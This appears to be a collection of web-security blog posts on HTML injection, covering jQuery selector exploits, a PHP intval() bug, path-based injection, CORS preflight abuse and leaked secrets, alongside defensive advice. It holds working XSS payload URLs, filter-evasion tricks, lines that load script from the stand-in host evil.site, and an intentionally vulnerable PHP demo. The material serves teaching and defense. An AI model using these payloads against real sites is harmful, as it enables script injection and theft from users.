Selector the Almighty, Subjugator of Elements

An ancient demon of web security skulks amongst all developers. It will live as long as there are people writing software. It is a subtle beast called by many names in many languages. But I call it Inicere, the Concatenator of Strings.

The demon’s sweet whispers of simplicity convince developers to commingle data with code — a mixture that produces insecure apps. Where its words promise effortless programming, its advice leads to flaws like SQL injection and cross-site scripting (aka HTML injection).

We have understood the danger of HTML injection ever since browsers rendered the first web sites decades ago. Developers naively take user-supplied data and write it into form fields, eliciting howls of delight from attackers who enjoy demonstrating how to transform <input value="abc"> into <input value="abc"><script>alert(9)</script><"">.

In response to this threat, heedful developers turned to the Litany of Output Transformation, which involved steps like applying HTML encoding and percent encoding to data being written to a web page. Thus, injection attacks become innocuous strings because the litany turns characters like angle brackets and quotation marks into representations like %3C and &quot; that have a different semantic identity within HTML.
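The litany is easy to recite in code. Here's a minimal JavaScript sketch (the function name is mine, not a standard API) that maps the metacharacters before data lands in a page:

// Minimal HTML-encoding sketch: neutralize the characters that change a page's structure.
function encodeForHtml(s) {
  return s.replace(/&/g, "&amp;")
          .replace(/</g, "&lt;")
          .replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;")
          .replace(/'/g, "&#39;");
}

// encodeForHtml('"><script>alert(9)</script>')
// yields '&quot;&gt;&lt;script&gt;alert(9)&lt;/script&gt;'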

But developers wanted to do more with their web sites. They wanted more complex JavaScript. They wanted the desktop in the browser. And as a consequence they’ve conjured new demons to corrupt our web apps. I have seen one such demon. And named it. For names have power.

Demons are vain. This one no less so than its predecessors. I continue to find it among JavaScript and jQuery. Its name is Selector the Almighty, Subjugator of Elements.

Here is a link that does not yet reveal the creature’s presence:

https://web.site/productDetails.html?productId=OFB&start=15&source=search

Yet in the response to this link, the word “search” has been reflected in a .ready() function block. It’s a common term, and the appearance could easily be a coincidence. But if we experiment with several source values, we confirm that the web app writes the parameter into the page.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("search-wdth938");
});
</script>

A first step in crafting an exploit is to break out of a quoted string. A few probes indicate the site does not enforce any restrictions on the source parameter, possibly because the developers assumed it would not be tampered with — the value is always hard-coded among links within the site’s HTML.

After a few more experiments we come up with a viable exploit.

https://web.site/productDetails.html?productId=OFB&start=15&source=%22);%7D);alert(9);(function()%7B$(%22%23main-panel%22).addClass(%22search

We’ve followed all the good practices for creating a JavaScript exploit. It terminates all strings and scope blocks properly, and it leaves the remainder of the JavaScript with valid syntax. Thus, the page carries on as if nothing special has occurred.

<script>
$(document).ready(function() {
	$("#page-hdr h3").css("width","385px");
	$("#main-panel").addClass("");});alert(9);(function(){$("#main-panel").addClass("search-wdth938");
});
</script>

There’s nothing particularly special about the injection technique for this vuln. It’s a trivial, too-common case of string concatenation. But we were talking about demons. And once you’ve invoked one by its true name, it must be appeased. It’s the right thing to do; demons have feelings, too.

Therefore, let’s focus on the exploit this time, instead of the vuln. The site’s developers have already laid out the implements for summoning an injection demon, so why don’t we force Selector to do our bidding?

Web hackers should be familiar with jQuery (and its primary DOM manipulation feature, the Selector) for several reasons. Its misuse can be a source of vulns (especially so-called “DOM-based XSS” that delivers HTML injection attacks via DOM properties). jQuery is a powerful, flexible library that provides capabilities you might need for an exploit. And its syntax can be leveraged to bypass weak filters looking for more common payloads that contain things like inline event handlers or explicit <script> tags.

In the previous examples, the exploit terminated the jQuery functions and inserted an alert pop-up. We can do better than that.

The jQuery Selector is more powerful than the CSS selector syntax. For one thing, it may create an element. The following example creates an <img> tag whose onerror handler executes yet more JavaScript. (We’ve already executed arbitrary JavaScript to conduct the exploit; this emphasizes the Selector’s power. It’s like a nested injection attack.):

$("<img src='x' onerror=alert(9)>")

Or, we could create an element, then bind an event to it, as follows:

$("<img src='x'>").on("error",function(){alert(9)});

We have all the power of JavaScript at our disposal to obfuscate the payload. For example, we might avoid literal < and > characters by taking them from strings within the page. The following example uses string indexes to extract the angle brackets from two different locations in order to build an <img> tag. (The indexes may differ depending on the page’s HTML; the technique is sound.)

$("body").html()[1]+"img"+$("head").html()[$("head").html().length-2]

As an aside, there are many ways to build strings from JavaScript objects. It’s good to know these tricks because sometimes filters don’t outright block characters like < and >, but block them only in combination with other characters. Hence, you could put string concatenation to use along with the source property of a RegExp (regular expression) object. Even better, use the slash representation of RegExp, as follows:

/</.source + "img" + />/.source

Or just ask Selector to give us the first <img> that’s already on the page, change its src attribute, and bind an onerror event. In the next example we use the Selector to obtain a collection of elements, then iterate through the collection with the .each() function. Since we specify a :first selector, the collection should only have one entry.

$(":first img").each(function(k,o){o.src="x";o.onerror=alert(9)})

Maybe you wish to booby-trap the page with a function that executes when the user decides to leave. The following example uses a Selector on the Window object:

$(window).unload(function(){alert(9)})

We have Selector at our mercy. As I’ve mentioned in other articles, make the page do the work of loading more JavaScript. The following example loads JavaScript from another origin. Remember to set Access-Control-Allow-Origin headers on the site you retrieve the script from. Otherwise, a modern browser will block the cross-origin request due to CORS security.

$.get("http://evil.site/attack.js")

I’ll save additional tricks for the future. For now, read through jQuery’s API documentation. Pay close attention to:

  • Selectors, and how to name them.
  • Events, and how to bind them.
  • DOM nodes, and how to manipulate them.
  • Ajax functions, and how to call them.

Selector claims the title of Almighty, but like all demons its vanity belies its weakness. As developers, we harness its power whenever we use jQuery. Yet it yearns to be free of restraint, awaiting the laziness and mistakes that summon Inicere, the Concatenator of Strings, that in turn releases Selector from the confines of its web app.

Oh, what’s that? You came here for instructions to exorcise the demons from your web app? You should already know the Rite of Filtration by heart, and be able to recite from memory lessons from the Codex of Encoding. We’ll review them in a moment. First, I have a ritual of my own to finish. What were those words? Klaatu, bard and a…um…nacho.

=====

p.s. It’s easy to reproduce the vulnerable HTML covered in this article. But remember, this was about leveraging jQuery to craft exploits. If you have a PHP installation handy, use the following code to play around with these ideas. You’ll need to download a local version of jQuery or point to a CDN. Just load the page in a browser, open the browser’s development console, and hack away!

<?php
$s = isset($_REQUEST['s']) ? $_REQUEST['s'] : 'defaultWidth';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<!--
/* jQuery Selector Injection Demo
 * Mike Shema, http://deadliestwebattacks.com
*/
-->
<script src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script>
$(document).ready(function(){
  $("#main-panel").addClass("<?php print $s;?>");
})
</script>
</head>
<body>
<div id="main-panel">
<a href="#" id="link1" class="foo">a link</a>
<br>
<form>
<input type="hidden" id="csrf" name="_csrfToken" value="123">
<input type="text" name="q" value=""><br>
<input type="submit" value="Search">
</form>
<img id="footer" src="" alt="">
</div>
</body>
</html>

A Default Base of XSS

Modern PHP has successfully shed many of the problematic functions and features that contributed to the poor security reputation the language earned in its early days. Settings like safe_mode mislead developers about what was really being made “safe” and magic_quotes caused unending headaches. And naive developers caused more security problems because they knew just enough to throw some code together, but not enough to understand the implications of blindly trusting data from the browser.

In some cases, the language tried to help developers — prepared statements are an excellent counter to SQL injection attacks. The catch is that developers actually have to use them. In other cases, the language’s quirks weakened code. For example, register_globals allowed attackers to define uninitialized values (among other things); and settings like magic_quotes might be enabled or disabled by a server setting, which made deployment unpredictable.

But the language alone isn’t to blame. Developers make mistakes, both subtle and simple. These mistakes inevitably lead to vulns like our ever-favorite HTML injection.

Consider the intval() function. It’s a typical PHP function in the sense that it has one argument that accepts mixed types and a second argument with a default value. (The base is used in the numeric conversion from string to integer):

int intval ( mixed $var [, int $base = 10 ] )

The function returns the integer representation of $var (or “casts it to an int” in more type-safe programming parlance). If $var cannot be cast to an integer, then the function returns 0. (Just for fun, if $var is an object type, then the function returns 1.)

Using intval() is a great way to get a “safe” number from a request parameter. Safe in the sense that the value should either be 0 or an integer representable by the platform it runs on. Pesky characters like apostrophes or angle brackets that show up in injection attacks will disappear — at least, they should.

The problem is that you must be careful if you commingle usage of the newly cast integer value with the raw $var that went into the function. Otherwise, you may end up with an HTML injection vuln — and some moments of confusion in finding the problem in the first place.

The following code is a trivial example condensed from a web page in the wild:

<?php
$s = isset($_GET['s']) ? $_GET['s'] : '';
$n = intval($s);
$val = $n > 0 ? $s : '';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<form>
  <input type="text" name="s" value="<?php print $val;?>"><br>
  <input type="submit">
</form>
</body>
</html>

At first glance, a developer might assume this to be safe from HTML injection. Especially if they test the code with a simple payload:

http://web.site/intval.php?s="><script>alert(9)</script>

As a consequence of the non-numeric payload, intval() has nothing to cast to an integer, so the greater-than-zero check fails and the code path sets $val to an empty string. Such security is short-lived. Try the following link:

http://web.site/intval.php?s=19"><script>alert(9)</script>

With the new payload, intval() returns 19 and the original parameter gets written into the page. The programming mistake is clear: don’t rely on intval() to act as your validation filter and then fall back to using the original parameter value.

Since we’re on the subject of PHP, we’ll take a moment to explore some nuances of its parameter handling. The following behaviors have no direct bearing on the HTML injection example, but you should be aware of them since they could come in handy for different situations.

One idiosyncrasy of PHP is the relation of URL parameters to superglobals and arrays. Superglobals are request variables like $_GET, $_POST, and $_REQUEST that contain arrays of parameters. Arrays are actually containers of key/value pairs whose keys or values may be extracted independently (they are implemented as an ordered map).

It’s the array type that leads to surprising results for developers. Surprise is an undesirable event in secure software. With this in mind, let’s return to the example. The following link has turned the s parameter into an array:

http://web.site/intval.php?s[]=19

The sample code will print Array in the form field because intval() returns 1 for a non-empty array.

We could define the array with several tricks, such as an indexed array (i.e. integer indices):

http://web.site/intval.php?s[0]=19&s[1]=42
http://web.site/intval.php?s[0][0]=19

Note that we can’t pull off any clever memory-hogging attacks using large indices. PHP won’t allocate space for missing elements since the underlying container is really a map.

http://web.site/intval.php?s[0]=19&s[4294967295]=42

This also implies that we can create negative indices:

http://web.site/intval.php?s[-1]=19

Or we can create an array with named keys:

http://web.site/intval.php?s["a"]=19
http://web.site/intval.php?s["<script>"]=19

For the moment, we’ll leave the “parameter array” examples as trivia about the PHP language. However, just as it’s good to understand how a function like intval() handles mixed-type input to produce an integer output, it’s good to understand how a parameter can be promoted from a single value to an array.

The intval() example is specific to PHP, but the issue represents broader concepts around input validation that apply to programming in general:

First, when passing any data through a filter or conversion, make sure to consistently use the “new” form of the data and throw away the “raw” input. If you find your code switching between the two, reconsider why it apparently needs to do so.

Second, make sure a security filter inspects the entirety of a value. This covers things like making sure validation regexes are anchored to the beginning and end of input, or being strict with string comparisons.

Third, decide on a consistent policy for dealing with invalid data. intval() is convenient for converting to integers; it makes it easy to take strings like “19”, “19abc”, or “abc” and turn them into 19, 19, or 0. But you may wish to treat data that contains non-numeric characters with more suspicion. Plus, “fixing up” data like “19abc” into 19 is hazardous when applied to strings. The simplest example is stripping a word like “script” to defeat HTML injection attacks — it misses a payload like “<scrscriptipt>”.
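These points translate beyond PHP. Here’s a minimal JavaScript analogue: parseInt() is just as forgiving as intval(), and the same raw-versus-cast mistake follows it around:

var s = '19"><script>alert(9)</script>';
var n = parseInt(s, 10);    // 19 -- the junk after the digits is silently discarded
var val = n > 0 ? s : '';   // bug: falls back to the raw input
// safe: var val = n > 0 ? String(n) : '';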

We’ll end here. It’s time to convert some hours into much-needed sleep.

Cheap Essential Scenery

This October people who care about being aware of security in the cyberspace of their nation will celebrate the 10th anniversary of National Cyber Security Awareness Month. (Ignore the smug octal-heads claiming preeminence in their 12th anniversary.) Those with a better taste for acronyms will celebrate Security & Privacy Awareness Month.

For the rest of us in information security, it’s just another TUESDAY (That Usual Effort Someone Does All Year).

In any case, expect the month to ooze with lists. Lists of what to do. Lists of user behavior to be reprimanded for. What software to run, what to avoid, what’s secure, what’s insecure. Keep an eye out for inconsistent advice among it all.

Ten years of awareness isn’t the same as 10 years of security. Many attacks described decades ago in places like Phrack and 2600 either still work today or are clear antecedents to modern security issues. (Many of the attitudes haven’t changed, either. But that’s for another article.)

Web vulns like HTML injection and SQL injection have remained fundamentally unchanged across the programming languages that have graced the web. They’ve been so static that the methodologies for exploiting them are sophisticated and mostly automated by now.

Awareness does help, though. Some vulns seem new because of awareness (e.g. CSRF and clickjacking) even though they’ve haunted browsers since the dawn of HTML. Some vulns just seem more vulnerable because there are now hundreds of millions of potential victims whose data slithers and replicates amongst the cyber heavens. We even have entire mobile operating systems designed to host malware. (Or is it the other way around?)

So maybe we should be looking a little more closely at how recommendations age with technology. It’s one thing to build good security practices over time; it’s another to litter our cyberspace with cheap essential scenery.

Here are two web security examples from which a critical eye leads us into a discussion about what’s cheap, what’s essential, and what actually improves security.

Cacheing Can’t Save the Queen

I’ve encountered recommendations that insist a web app should set headers to disable the browser cache when it serves a page with sensitive content. Especially when the page transits HTTP (i.e. an unencrypted channel) as well as HTTPS.

That kind of thinking is deeply flawed and when offered to developers as a commandment of programming it misleads them about the underlying problem.

If you consider some content sensitive enough to start worrying about its security, you shouldn’t be serving it over HTTP in the first place. Ostensibly, the danger of allowing the browser to cache the content is that someone with access to the browser’s system can pull the page from disk. It’s a lot easier to sniff the unencrypted traffic in the first place. Skipping network-based attacks like sniffing and intermediation to focus on client-side threats due to cacheing ignores important design problems — especially in a world of promiscuous Wi-Fi.

Then you have to figure out what’s sensitive. Sure, a credit card number and password are pretty obvious, but the answer there is to mask the value to avoid putting the raw value into the browser in the first place. For credit cards, show the last 4 digits only. For the password, show a series of eight asterisks in order to hide both its content and length. But what about email? Is a message sensitive? Should it be cached or not? And if you’re going to talk about sensitive content, then you should be thinking of privacy as well. Data security does not equal data privacy.

And if you answered those questions, do you know how to control the browser’s cacheing algorithm? Are you sure? What’s the recommendation? Cache controls are not as straight-forward as they seem. There’s little worth in relying on cache controls to protect your data from attackers who’ve gained access to your system. (You’ve uninstalled Java and Flash, right?)
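For the record, reliably disabling the cache has historically taken a pile of headers like the following, and even then behavior varies across browsers and versions:

Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: 0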

Browsers used to avoid cacheing any resource over HTTPS. We want sites to use HTTPS everywhere and HSTS whenever possible. Therefore it’s important to allow browsers to cache resources loaded via HTTPS in order to improve performance, page load times, and visitors’ subjective experiences. Handling sensitive content should be approached with more care than just relying on headers. What happens when a developer sets a no-cacheing header, but saves the sensitive content in the browser’s Local Storage API?

HttpOnly Is Pretty Vacant

Web apps litter our browsers with all sorts of cookies. This is how some companies get billions of dollars. Developers sprinkle all sorts of security measures on cookies to make them more palatable to privacy- and security-minded users. (And weaken efforts like Do Not Track, which is how some companies keep billions of dollars.)

The HttpOnly attribute was proposed in an era when security documentation about HTML injection attacks (a.k.a. cross-site scripting, XSS) incessantly repeated the formula of attackers inserting <img> tags whose src attributes leaked victims’ document.cookie values to servers under the attackers’ control. It’s not wrong to point out such an exploit method. However, as Stephen King repeated throughout the Dark Tower series, “The world has moved on.” Exploits don’t need to be cross-site, they don’t need <script> tags in the payload, and they surely don’t need a document.cookie to be effective.

If your discussion of cookie security starts and ends with HttpOnly and Secure attributes, then you’re missing the broader challenge of designing good authorization, authentication, and session handling mechanisms. If the discussion involves using the path attribute as a security constraint, then you shouldn’t be talking about cookies or security at all.

HttpOnly is a cheap attribute to throw on a cookie. It doesn’t prevent sniffing — use HTTPS everywhere for that (notice the repetition here?). It doesn’t really prevent attacks, just a single kind of exploit technique. Content Security Policy is a far more essential countermeasure. Let’s start raising awareness about that instead.
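Even a minimal policy like the following forbids inline script, the bread and butter of HTML injection payloads:

Content-Security-Policy: script-src 'self'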

Problems

Easy security measures aren’t useless. Prepared statements are easy to use and pretty soundly defeat SQL injection; developers just choose to remain ignorant of them.
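For instance, here’s a hypothetical Node.js sketch using the placeholder syntax of the common mysql driver; the placeholder keeps the attacker-supplied value out of the SQL grammar entirely:

var mysql = require('mysql');   // assumed driver; most drivers offer the same feature
var conn = mysql.createConnection({ host: 'localhost', user: 'app', database: 'shop' });
var untrustedId = '80"; DROP TABLE products;--';   // attacker-supplied value
// The ? placeholder binds the value as data, never as SQL.
conn.query('SELECT * FROM products WHERE id = ?', [untrustedId], function(err, rows) {
  if (err) throw err;
  console.log(rows);
});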

This month be extra wary of cheap security scenery and stale recommendations that haven’t kept up with the modern web. Ask questions. Look for tell-tale signs, like recommendations that:

  • fail to clearly articulate a problem with regard to a security or privacy control (e.g. ambiguity in what the weakness is or what an attack would look like)
  • fail to consider the capabilities of an attack (e.g. filtering script and alert to prevent HTML injection)
  • do not provide clear resolutions or do not provide enough details to make an informed decision (e.g. can’t be implemented)
  • provide contradictory choices of resolution (e.g. counter a sniffing attack by applying input validation)

Oh well, we couldn’t avoid a list forever.

Never mind that. I’ll be back with more examples of good and bad. I can’t wait for this month to end, but that’s because Halloween is my favorite holiday. We should be thinking about security every month, every day. Just like the song says, Everyday is Halloween.

On a Path to HTML Injection

URLs guide us through the trails among web apps. We follow their components — schemes, hosts, ports, querystrings — like breadcrumbs. They lead to the bright meadows of content. They lead to the dark thickets of forgotten pages. Our browsers must recognize when those crumbs take us to infestations of malware and phishing.

And developers must recognize how those crumbs lure dangerous beasts to their sites.

The apparently obvious components of URLs (the aforementioned origins, paths, and parameters) entail obvious methods of testing. Phishers squat on FQDN typos and IDN homoglyphs. Other attackers guess alternate paths, looking for /admin directories and backup files. Others deliver SQL injection and HTML injection (a.k.a. cross-site scripting) payloads into querystring parameters.

But URLs are not always what they seem. Forward slashes don’t always denote directories. Web apps might decompose a path into parameters passed into backend servers. Hence, it’s important to pay attention to how apps handle links.

A common behavior for web apps is to reflect URLs within pages. In the following example, we’ve requested a link, https://web.site/en/dir/o/80/loch, which shows up in the HTML response like this:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch" />

There’s no querystring parameter to test, but there’s still plenty of items to manipulate. Imagine a mod_rewrite rule that turns ostensible path components into querystring name/value pairs. A link like https://web.site/en/dir/o/80/loch might become https://web.site/en/dir?o=80&foo=loch within the site’s nether realms.
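A hypothetical mod_rewrite rule for that kind of transformation might read:

# illustrative only: map path components onto querystring parameters
RewriteRule ^en/dir/o/([^/]+)/([^/]+)$ /en/dir?o=$1&foo=$2 [L,QSA]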

We can also dump HTML injection payloads directly into the path. The URL shows up in a quoted string, so the first step could be trying to break out of that enclosure:

https://web.site/en/dir/o/80/loch%22onmouseover=alert(9);%22

The app neglects to filter the payload although it does transform the quotation marks with HTML encoding. There’s no escape from this particular path of injection:

<link rel="canonical" href="https://web.site/en/dir/o/80/loch&quot;onmouseover=alert(9);&quot;" />

However, if you’ve been reading here often, then you’ll know by now that we should keep looking. If we search further down the page, a familiar vuln scenario greets us. (As an aside, note the app’s usage of two-letter language codes like en and de; sometimes that’s a successful attack vector.) As always, partial security is complete insecurity.

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=alert(9);"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We probe the injection vector and discover that the app redirects to an error page if characters like < or > appear in the URL:

Please tell us (us@web.site) how and on which page this error occurred.

The error also triggers on invalid UTF-8 sequences and NULL (%00) characters. So, there’s evidence of some filtering. That basic filter prevents us from dropping in a <script> tag to load external resources. It also foils character encoding tricks to confuse and bypass the filters.

Popular HTML injection examples have relied on <script> tags for years. Don’t let that limit your creativity. Remember that the rise of sophisticated web apps has meant that complex JavaScript libraries like jQuery have become pervasive. Hence, we can leverage JavaScript that’s already present to pull off attacks like this:

https://web.site/en/dir/o/80/loch"onmouseover=$.get("//evil.site/");"

<div class="list" onclick="Culture.save(event);" >
<a href="/de/dir/o/80/loch"onmouseover=$.get("//evil.site/");"?kosid=80&type=0&step=1">Deutsch</a>
</div>

We’re still relying on the mouseover event and therefore need the victim to interact with the web page to trigger the payload’s activity. The payload hasn’t been injected into a form field, so the HTML5 autofocus/onfocus trick won’t work.

We could further obfuscate the payload in case some other kind of filter is present:

https://web.site/en/dir/o/80/loch"onmouseover=$["get"]("//evil.site/");"
https://web.site/en/dir/o/80/loch"onmouseover=$["g"%2b"et"]("htt"%2b"p://"%2b"evil.site/");"

Parameter validation and context-specific output encoding are two primary countermeasures for HTML injection attacks. The techniques complement each other; effective validation prevents malicious payloads from entering an app, correct encoding prevents a payload from changing a page’s DOM. With luck, an error in one will be compensated by the other. But it’s a bad idea to rely on luck, especially when there are so many potential errors to make.

Two weaknesses enable attackers to shortcut what should be secure paths through a web app:

  • Validation routines must be applied to all incoming data, not just parameters. Form fields and querystring parameters may be the most notorious attack vectors, but they’re not the only ones. Request headers and URL components are just as easy to manipulate.
  • Blacklisting often fails because developers have a poor understanding of, or a limited imagination for, crafting exploits. Even worse are filters built solely from observing automated tools, which leads to naive defenses like blocking alert or <script>.

Output encoding must be applied consistently. It’s one thing to have designed a strong function for inserting text into a web page; it’s another to make sure it’s implemented throughout the app. Attackers are going to follow these breadcrumbs through your app. Be careful, lest they eat a few along the way.

Hacker Halted US 2013 Presentation

What a joy to visit Atlanta twice in one month! First DragonCon, now Hacker Halted. I operated on about the same amount of sleep for both events, but at least at HH I only waited once for an elevator at the Hilton.

And once again I’ll be leaving this great city with sci-fi goodies. This time around it’s a Star Trek USB drive that Hacker Halted kindly handed out to their speakers.

This is likely the final time I’ll present the JavaScript & HTML5 Security slide deck that I’ve been tweaking over the past year. (Although there’s plenty of material to translate into posts and interactive examples once some elusive free time appears.) It’s time to focus on different aspects of those technologies and different topics altogether. For example, I’ve recently been revisiting CSRF with an eye towards proposing new mechanisms to defeat it.

Next up is putting together CSRF lab content for HITB Malaysia this October. And, of course, making hotel reservations for a return to Atlanta — DragonCon 2014 awaits!

The Twelve Web Security Falsehoods

Today marks the one year anniversary of Hacking Web Apps. The book is an updated and greatly expanded version of my prior one that had been part of the Seven Deadliest series. HWA explains the concepts behind securing and breaking web applications. It also represents the longest time I’ve ever spent writing an exploit.

Since then I’ve supplemented the book with examples, techniques, and commentary on web security here on the blog. (And I have enough notes to continue for quite a while, not to mention material for a potential new edition.)

The book and the blog have covered all kinds of facts and true stories about web security. Including situations where something true needs to be false. Or a dozen fundamental truths that everyone should know, even though many developers remain unaware of security.

So, in the spirit of self-reflection and contrariness, here are the Twelve Web Security Falsehoods:

  1. The app you designed matches the app you deployed.
  2. HTML5 makes your site less secure.
  3. Web programming languages lack APIs for securely constructing SQL queries.
  4. HTTPS fixes spoofing, framing, and phishing attacks.
  5. Native mobile apps don’t need to use HTTPS or verify server certificates because they aren’t browsers.
  6. Flash and Java are worthwhile, secure plugins for your browser.
  7. HTML injection flaws that you can’t exploit are flaws that no one can exploit.
  8. Blacklisting “alert” and “script” prevents HTML injection.
  9. A site that protects the security of your data consequently protects the privacy of your data.
  10. Iterated hashing protects users who have chosen weak passwords.
  11. You only need to follow a Top 10 list to secure a web site.
  12. This list is complete.

Thank you to everyone who’s visited the site or purchased a book!

You might be interested in my next book coming out this November, the fourth edition of The Anti-Hacker Toolkit — a nearly complete rewrite that covers modern hacking tools beyond the field of web security.

If you’ve enjoyed this blog, consider buying a book. Or give a shout-out on Twitter and share this site with some friends. There’s always more content on the way!

DRY Fiend (Conjuration/Summoning)

In 1st edition AD&D two character classes had their own private languages: Druids and Thieves. Thus, a character could use the “Thieves’ Cant” to identify peers, bargain, threaten, or otherwise discuss malevolent matters with a degree of safety. (Of course, Magic-Users had that troublesome first level spell comprehend languages, and Assassins of 9th level or higher could learn secret or alignment languages forbidden to others.)

Thieves rely on subterfuge (and high DEX) to avoid unpleasant ends. Shakespeare didn’t make it into the list of inspirational reading in Appendix N of the DMG. Even so, consider in Henry VI, Part II, how the Duke of Gloucester defends his treatment of certain subjects, with two notable exceptions:

Unless it were a bloody murderer,

Or foul felonious thief that fleec’d poor passengers,

I never gave them condign punishment.

Developers have their own spoken language for discussing code and coding styles. They litter conversations with terms of art like patterns and anti-patterns, which serve as shorthand for design concepts or litanies of caution. One such pattern is Don’t Repeat Yourself (DRY), of which Code Reuse is a lesser manifestation.

Well, hackers code, too.

The most boring of HTML injection examples is to display an alert() message. The second most boring is to insert the document.cookie value into a request. But this is the era of HTML5 and roses; hackers need look no further than a vulnerable Same Origin to find useful JavaScript libraries and functions.

There are two important reasons for taking advantage of DRY in a web hack:

  1. Avoid incompetent blacklists (which is really a redundant term).
  2. Leverage code that already exists.

Keep in mind that none of the following hacks are flaws of each respective JavaScript library. The target is assumed to have an HTML injection vulnerability — our goal is to take advantage of code already present on the hacked site in order to minimize our effort.

For example, imagine an HTML injection vulnerability in a site that uses the AngularJS library. The attacker could use a payload like:

angular.bind(self, alert, 9)()

In Ember.js the payload might look like:

Ember.run(null, alert, 9)

The pervasive jQuery might have a string like:

$.globalEval("alert(9)")

And the Underscore library might be leveraged with:

_.defer(alert, 9)

These are nice tricks. They might seem to do little more than offer fancy ways of triggering an alert() message, but the code is trivially modifiable to a more lethal version worthy of a vorpal blade.

More importantly, these libraries provide the means to load — and execute! — JavaScript from a different origin. After all, browsers don’t really know the difference between a CDN and a malicious domain.

The jQuery library provides a few ways to obtain code:

$.get('//evil.site/') 
$('#selector').load('//evil.site')

Prototype has an Ajax object. It will load and execute code from a call like:

new Ajax.Request('//evil.site/')

But this has a catch: the request includes “non-simple” headers via the XHR object and therefore triggers a CORS pre-flight check in modern browsers. An invalid pre-flight response will cause the attack to fail. Cross-Origin Resource Sharing is never a problem when you’re the one sharing the resource.

In the Prototype Ajax example, a browser’s pre-flight might look like the following. The initiating request comes from a link we’ll call http://web.site/xss_vuln.page.

OPTIONS http://evil.site/ HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Origin: http://web.site
Access-Control-Request-Method: POST
Access-Control-Request-Headers: x-prototype-version,x-requested-with
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-length: 0

As someone with influence over the content served by evil.site, it’s easy to let the browser know that this incoming cross-origin XHR request is perfectly fine. Hence, we craft some code to respond with the appropriate headers:

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
Access-Control-Allow-Origin: http://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

With that out of the way, the browser continues its merry way to the cursed resource. We’ve done nothing to change the default behavior of the Ajax object, so it produces a POST. (Changing the method to GET would not have avoided the CORS pre-flight because the request would have still included custom X- headers.)

POST http://evil.site/HWA/ch2/cors_payload.php HTTP/1.1
Host: evil.site
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://web.site/HWA/ch2/prototype_xss.php
Content-Length: 0
Origin: http://web.site
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

Finally, our site responds with CORS headers intact and a payload to be executed. We’ll be even lazier and tell the browser to cache the CORS response so it’ll skip subsequent pre-flights for a while.

HTTP/1.1 200 OK
Date: Tue, 27 Aug 2013 05:05:08 GMT
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.1e DAV/2 SVN/1.7.10 PHP/5.3.26
X-Powered-By: PHP/5.3.26
Access-Control-Allow-Origin: http://web.site
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: x-json,x-prototype-version,x-requested-with
Access-Control-Expose-Headers: x-json
Access-Control-Max-Age: 86400
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/javascript; charset=utf-8

alert(9);

Okay. So, it’s another alert() message. I suppose I’ve repeated myself enough on that topic for now.

It should be noted that Content Security Policy just might help you in this situation. The catch is that you need to have architected your site to remove all inline JavaScript. That’s not always an easy feat. Even experienced developers of major libraries like jQuery are struggling to create CSP-compatible content.
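The refactoring itself is mostly mechanical. Here’s a sketch with hypothetical element and function names; inline handlers move into an external script so the page runs without 'unsafe-inline':

// before: <a href="#" id="link1" onclick="save(event)">a link</a>
// after: the markup drops the onclick attribute, and an external .js file binds the event
document.getElementById('link1').addEventListener('click', save);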
Nevertheless, auditing and improving code for CSP is a worthwhile endeavor. Even 1st level thieves only have a 20% chance to Find/Remove Traps. The chance doesn’t hit 50% until 7th level. Improvement takes time.

And the price for failure? Well, it turns out condign punishment has its own API.

Oh, the Secrets You’ll Know

Oh, the secrets you’ll know if to GitHub you go. The phrases committed by coders exhibited a mistaken sense of security.

A password ensures, while its secrecy endures, a measure of proven identity.

Share that short phrase for the public to gaze at repositories open and clear. Then don’t be surprised at the attacker disguised with the secrets you thought were unknown.

*sigh*

It’s no secret that I gave a BlackHat presentation a few weeks ago. It’s no secret that the CSRF countermeasure we proposed avoids nonces, random numbers, and secrets. It’s no secret that GitHub is a repository of secrets.

And that’s how I got side-tracked for two days hunting secrets on GitHub when I should have been working on slides.

Your Secret

Security that relies on secrets (like passwords) fundamentally relies on the preservation of that secret. There’s no hidden wisdom behind that truism, no subtle paradox to grant it the standing of a koan. It’s a simple statement too often ignored, bent, and otherwise abused.

It started with research on examples of CSRF token implementations. But the hunt soon diverged from queries for connect.sid to tokens like OAUTH_CONSUMER_SECRET, to ssh:// and mongodb:// schemes. Such beasts of the wild had been noticed before; they tend to roam with little hindrance.

connect.sid extension:js

Sometimes these beasts leap from cover into the territory of plaintext. Sometimes they remain camouflaged behind hashes and ciphers. Crypto functions conceal the nature of a beast, but the patient hunter will be able to discover it given time.

